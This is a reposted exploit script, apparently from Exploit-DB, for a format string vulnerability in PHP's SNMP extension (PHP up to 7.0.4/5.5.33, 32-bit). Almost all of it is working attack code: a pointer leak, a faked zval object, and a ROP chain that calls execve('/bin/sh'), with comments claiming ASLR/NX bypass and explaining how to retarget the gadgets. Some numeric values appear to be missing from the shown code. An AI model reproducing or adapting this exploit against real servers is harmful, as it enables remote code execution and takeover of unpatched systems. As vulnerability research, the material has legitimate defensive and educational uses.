PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit <?php // PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit) // By Andrew Kramer <andrew at jmpesp dot org> // Should bypass ASLR/NX just fine // This exploit utilizes PHP's internal "%Z" (zval) // format specifier in order to achieve code-execution. // We fake an object-type zval in memory and then bounce // through it carefully. First though, we use the same // bug to leak a pointer to the string itself. We can // then edit the global variable with correct pointers // before hitting it a second time to get EIP. This // makes it super reliable! Like... 100%. // To my knowledge this hasn't really been done before, but // credit to Stefan Esser (@i0n1c) for the original idea. It works! // https://twitter.com/i0n1c/status/664706994478161920 // All the ROP gadgets are from a binary I compiled myself. // If you want to use this yourself, you'll probably need // to build a new ROP chain and find new stack pivots for // whatever binary you're targeting. If you just want to get // EIP, change $stack_pivot_1 to 0x41414141 below. // pass-by-reference here so we keep things tidy function trigger(&$format_string) { $session = new SNMP(SNMP::VERSION_3, "127.0.0.1", "public"); // you MUST set exceptions_enabled in order to trigger this $session->exceptions_enabled = SNMP::ERRNO_ANY; try { $session->get($format_string); } catch (SNMPException $e) { return $e->getMessage(); } } // overwrite either $payload_{1,2} with $str at $offset function overwrite($which, $str, $offset) { // these need to be global so PHP doesn't just copy them global $payload_1, $payload_2; // we MUST copy byte-by-byte so PHP doesn't realloc for($c=; $c<strlen($str); $c++) { switch($which) { case 1: $payload_1[$offset + $c] = $str[$c]; break; case 2: $payload_2[$offset + $c] = $str[$c]; break; } } } echo "> Setting up payloads\n"; //$stack_pivot_1 = pack("L", 0x41414141); // Just get EIP, no exploit $stack_pivot_1 = pack("L", 0x0807c19f); // xchg esp ebx $stack_pivot_2 = pack("L", 0x0809740e); // add esp, 0x14 // this is used at first to leak the pointer to $payload_1 $leak_str = str_repeat("%d", 13) . $stack_pivot_2 . "Xw00t%lxw00t"; $trampoline_offset = strlen($leak_str); // used to leak a pointer and also to store ROP chain $payload_1 = $leak_str . // leak a pointer "XXXX" . // will be overwritten later $stack_pivot_1 . // initial EIP (rop start) // ROP: execve('/bin/sh',0,0) pack("L", 0x080f0bb7) . // xor ecx, ecx; mov eax, ecx pack("L", 0x0814491f) . // xchg edx, eax pack("L", 0x0806266d) . // pop ebx pack("L", 0x084891fd) . // pointer to /bin/sh pack("L", 0x0807114c) . // pop eax pack("L", 0xfffffff5) . // -11 pack("L", 0x081818de) . // neg eax pack("L", 0x081b5faa); // int 0x80 // used to trigger the exploit once we've patched everything $payload_2 = "XXXX" . // will be overwritten later "XXXX" . // just padding, whatevs "\x08X" . // zval type OBJECT str_repeat("%d", 13) . "%Z"; // trigger the exploit // leak a pointer echo "> Attempting to leak a pointer\n"; $data = trigger($payload_1); $trampoline_ptr = (int)hexdec((explode("w00t", $data)[1])) + $trampoline_offset; echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n"; // If there are any null bytes or percent signs in the pointer, it will break // the -0x10 will be applied later, so do it now too if(strpos(pack("L", $trampoline_ptr - 0x10), "\x00") !== false || strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) { echo "> That pointer has a bad character in it\n"; echo "> This won't work. Bailing out... :(\n"; exit(); } echo "> Overwriting payload with calculated offsets\n"; // prepare the trampoline // code looks kinda like... // mov eax, [eax+0x10] // mov eax, [eax+0x54] // call eax overwrite(2, pack("L", $trampoline_ptr - 0x10), ); overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset); // exploit echo "> Attempting to pop a shell\n"; trigger($payload_2); // if we make it here, something didn't work echo "> Exploit failed :(\n"; Sursa: https://www.exploit-db.com/exploits/39645/